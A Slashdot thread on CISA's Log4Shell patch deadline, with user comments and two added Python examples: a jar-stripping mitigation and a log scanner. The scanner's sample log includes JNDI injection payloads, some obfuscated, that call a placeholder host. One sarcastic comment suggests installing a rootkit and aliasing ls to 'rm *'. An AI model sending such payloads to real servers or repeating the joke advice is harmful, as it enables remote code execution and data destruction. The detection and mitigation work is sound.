CISA Tells Federal Agencies To Patch Log4Shell Before Christmas (therecord.media)
The US Cybersecurity and Infrastructure Security Agency has told federal civilian agencies to patch systems affected by the Log4Shell vulnerability by Christmas Eve. From a report: The agency yesterday added the Log4Shell bug (CVE-2021-44228) to its catalog of actively-exploited vulnerabilities, along with 12 other security flaws. According to this catalog, federal agencies have ten days at their disposal to test which of their internal apps and servers utilize the Log4j Java library, check if systems are vulnerable to the Log4Shell exploit, and patch affected servers. All of this must be done by December 24, according to a timeline provided in the catalog. In addition, CISA also launched yesterday a dedicated web page providing guidance to the US public and private sector regarding the Log4Shell vulnerability.
Re: (Score:2)
You're a mean one, Mr. Grinch.
Re: (Score:3)
It's a zero-day, that means you've only got a few weeks to act! "D'Oh!"
Re: (Score:2)
Puny in comparison. Code Red saw a peak of about 350,000 and SQL Slammer under 100,000. Log4j is estimated to be a flaw in millions of systems.
Was it coded in Java? Does it have a logging function? Odds are it uses Log4j.
How Much Time Did They Give Solarwinds? (Score:2)
Re: (Score:2)
You're making a comment that makes no sense whatsoever, and then ask for specifics? That'll be... Hard.. :D
Re: (Score:2)
Open source is also corporate.
Your word of the day is proprietary. Please study it carefully.
Not sure why you are so damn angry and aggressive? Zero people have claimed that Open Source "is corporate". OP pointed out that there exists corporate Open Source, and I agreed with that sentiment by giving you examples of such cases. MySQL was "corporate" back in the Monty days (he made money by selling a non-GPL-licensed version to companies wanting to link to MySQL from proprietary applications), but it became Corporate when SUN bought all assets from Monty.
Oracle does not "participate" in MySQL, they own
Vaccinate my server? (Score:5, Funny)
This is like the jab, but for servers. No thanks. My server already has performance issues due to all the WiFi antennas nearby. I have been supplying it with DC current that has been proven to boost memory allocations.
Re: (Score:2)
If you carefully wrap the case in tin foil that will protect it from both wifi and even 5G.
But adhesive-backed tin foil can be hard to find. So I recommend instead using copper foil. It is sold online as guitar shielding tape. Surely your server is as important as some hippie's guitar, right?
Does this affect log4net, the .NET C# clone? (Score:1)
Does this affect log4net, the .NET C# clone of log4j? There is .NET C# code running on Unix systems, so I'd assume so.
Re: (Score:2)
No, deserializing an object from a remote server and then executing it is only a Java thing. In .NET/C# the deserialization only works on the data, not the code.
Re: (Score:2)
Wow, deserializing a randomly-obtained object in Java executes it? That's seriously bad.
Re: (Score:2)
Not sure why this was modded down. Has Slashdot become as bad as Reddit?
Boss Called Again! (Score:2)
Re: Boss Called Again! (Score:3)
I have been telling people, do not install patches. Patches have side effects that can cause your server to behave erratically. What has really been proven to work is detoxifying your tmp directory and adding aliases to your shell config file. Just download and install detoxr_rootkit.sh from its website in Romania. Trust me I detoxed my tmp directory and immediately saw my server improve 10x while a bunch of previously blocked ports were opened up. A guy on YouTube found that aliasing ls to rm * cleared up
Re: (Score:2)
to inquire about nuking the data center from orbit.
It's the only way to be sure.
Re: (Score:2)
Sounds like your boss does so much cocaine maybe you should just route all your traffic through freenode
wot? (Score:1)
Re: (Score:3)
Well, you better get back at it because the 2.15 upgrade didn't fix everything and you will need to either upgrade again to 2.16, or delete the offending class from each classpath as a mitigation.
https://logging.apache.org/log4j/2.x/security.html [apache.org]
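The class-removal mitigation the comment above refers to, written out as an added example; this is not code from the thread or from the Apache project, which documents the mitigation as a `zip -d` one-liner on the linked security page. The script checks a jar (and jars nested inside a WAR or fat jar) for `JndiLookup.class` and strips the top-level copy, replacing the archive atomically. The jar layout, file names and the `make_sample_jar`/`demo` helpers are constructed for the demonstration.

```python
"""Find and strip JndiLookup.class from a log4j-core jar, the classpath
mitigation the Apache security page offers as an alternative to upgrading.
Added example; the jar layout and helpers are constructed, not a real jar."""
import io
import os
import tempfile
import zipfile

# Entry that the Apache security page names for the class-removal mitigation.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def find_jndi_lookup(jar, _depth=0):
    """Return every location of JndiLookup.class in `jar` (a path or a
    file-like object). Jars nested inside WARs or fat jars are searched up
    to three levels deep and reported as 'outer.jar!entry'."""
    hits = []
    with zipfile.ZipFile(jar) as zf:
        names = zf.namelist()
        if JNDI_LOOKUP in names:
            hits.append(JNDI_LOOKUP)
        if _depth < 3:
            for name in names:
                if name.endswith(".jar"):
                    inner = io.BytesIO(zf.read(name))
                    hits.extend(f"{name}!{h}" for h in find_jndi_lookup(inner, _depth + 1))
    return hits


def strip_jndi_lookup(jar_path):
    """Rewrite the jar at `jar_path` without its top-level JndiLookup.class.
    Returns True if the class was removed, False if it was not present.
    Nested jars are left untouched; those archives must be repacked."""
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP:
                    dst.writestr(info, src.read(info.filename))
    # Write to a temp file beside the jar and swap it in with os.replace, so
    # an interrupted run never leaves a truncated jar on the classpath.
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(os.path.abspath(jar_path)), suffix=".tmp")
    with os.fdopen(fd, "wb") as f:
        f.write(buf.getvalue())
    os.replace(tmp, jar_path)
    return True


def make_sample_jar(path):
    """Build a constructed jar: a fake log4j-core layout containing
    JndiLookup.class, plus a nested jar (as in a WAR) that also contains it."""
    fake_class = b"\xca\xfe\xba\xbe"  # class-file magic only; not real bytecode
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as izf:
        izf.writestr(JNDI_LOOKUP, fake_class)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", fake_class)
        zf.writestr(JNDI_LOOKUP, fake_class)
        zf.writestr("WEB-INF/lib/log4j-core-old.jar", inner.getvalue())


def demo():
    """Run the check, the strip and the re-check on a constructed jar and
    return (hits before, removed?, hits after, removed again?)."""
    with tempfile.TemporaryDirectory() as d:
        jar = os.path.join(d, "app.jar")
        make_sample_jar(jar)
        before = find_jndi_lookup(jar)
        removed = strip_jndi_lookup(jar)
        after = find_jndi_lookup(jar)
        again = strip_jndi_lookup(jar)
    return before, removed, after, again


if __name__ == "__main__":
    before, removed, after, again = demo()
    print("before:", before)
    print("removed top-level copy:", removed)
    print("still present (nested, needs repacking):", after)
```

The nested hit that survives the strip is the point of the re-check: a WAR or shaded jar carries its own copy of the class, so the mitigation has to be applied inside each archive on the classpath, and, as the comment says, upgrading to 2.16 is the fix rather than a workaround.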
Impossible task (Score:2)
Most government test plans take weeks to execute. And everyone's going on vacation or is already gone.
Do they mean 12/24/2022?
Re: Impossible task (Score:2)
Well, the alternative is hackers patching your server for you.
Re: (Score:3)
Really too bad that exploiting this issue to install patches for you is a crime. The world needs a patching vigilante.
A small reminder (Score:1)
The log4j vulnerability is bad, sure, no question. I'm sure it seemed a great idea at the time to be able to fetch external information to dynamically add to your logging messages (*not*).
However, let us not forget that, in order to be exploited, the server also has to be running a version of Java from 2018 or earlier. So any vulnerable servers are way, way behind on their security updates. As usual, it's not just the vulnerability; it is also incompetent or lazy sysadmins.
Just scan the systems, make someone fix them today (Score:2)
That would be a bit too slow (Score:2)
I already have at least 20 scans for this vulnerability in my web-server logs over the last 3 days. (No log4j or any other Java crap on my servers...)
Anybody that has not already patched this is criminally negligent.
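Detection logic for the scan traffic the comment above describes, added here as an example and not taken from the comment or from any project: the scans show up even on hosts without Java, and a plain search for `${jndi:` misses the obfuscated variants, so the script normalises URL encoding, `${lower:}`/`${upper:}` wrappers and `${...:-x}` default-value tricks before matching, then counts probes per source address. The log lines (Apache combined format), the IP addresses (documentation ranges) and the host names are constructed.

```python
"""Flag Log4Shell probe attempts in web-server access logs, including the
common obfuscated forms. Added example; the sample log lines are constructed."""
import re
from urllib.parse import unquote

# ${lower:j} / ${upper:N} -> the wrapped character
_CASE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*?)\s*\}", re.IGNORECASE)
# ${::-j} / ${env:NOPE:-j} -> the default value after ':-'
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*?)\}")
# What we are actually looking for once the wrappers are gone
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Apache/nginx combined log format
_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def normalize(s, max_rounds=10):
    """Undo URL encoding and the lookup-based obfuscations until the string
    stops changing (bounded so a pathological line cannot loop forever)."""
    prev = None
    for _ in range(max_rounds):
        if s == prev:
            break
        prev = s
        s = unquote(s)
        s = _CASE.sub(lambda m: m.group(1), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s


def scan_lines(lines):
    """Return one dict per log line that carries a JNDI lookup after
    normalisation: line number, source IP and the field that carried it.
    Lines that do not parse are scanned as a whole."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _LOG.match(line)
        fields = m.groupdict() if m else {"raw": line}
        for field, value in fields.items():
            if field in ("ip", "ts", "status"):
                continue
            if _JNDI.search(normalize(value)):
                hits.append({"line": n, "ip": fields.get("ip", "?"), "field": field})
                break
    return hits


def summarize(hits):
    """Probe count per source IP, for a quick triage view."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


# Constructed sample: two benign requests and four probes in different fields
# and encodings. Host names and addresses are placeholders, not real scanners.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Dec/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [13/Dec/2021:10:05:41 +0000] "GET /index.html HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://probe.example:1389/a}"',
    '198.51.100.23 - - [13/Dec/2021:10:05:42 +0000] '
    '"GET /?x=${${lower:j}ndi:${lower:l}dap://probe.example/a} HTTP/1.1" 404 196 "-" "curl"',
    '192.0.2.99 - - [13/Dec/2021:10:07:03 +0000] '
    '"GET /%24%7Bjndi%3Adns%3A%2F%2Fprobe.example%2Fa%7D HTTP/1.1" 404 196 "-" "-"',
    '192.0.2.99 - - [13/Dec/2021:10:07:04 +0000] "GET / HTTP/1.1" 200 612 '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://probe.example/a}" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Dec/2021:10:09:00 +0000] "GET /docs/log4j-2.16.html HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    found = scan_lines(SAMPLE_LOG)
    for h in found:
        print(h)
    print("probes per source:", summarize(found))
```

Normalising before matching is the part worth keeping: the scanners that hit the comment author's servers in the first days mostly sent the plain form, but the wrappers above cost an attacker nothing, so a detection rule that only looks for the literal string will go quiet long before the probing stops.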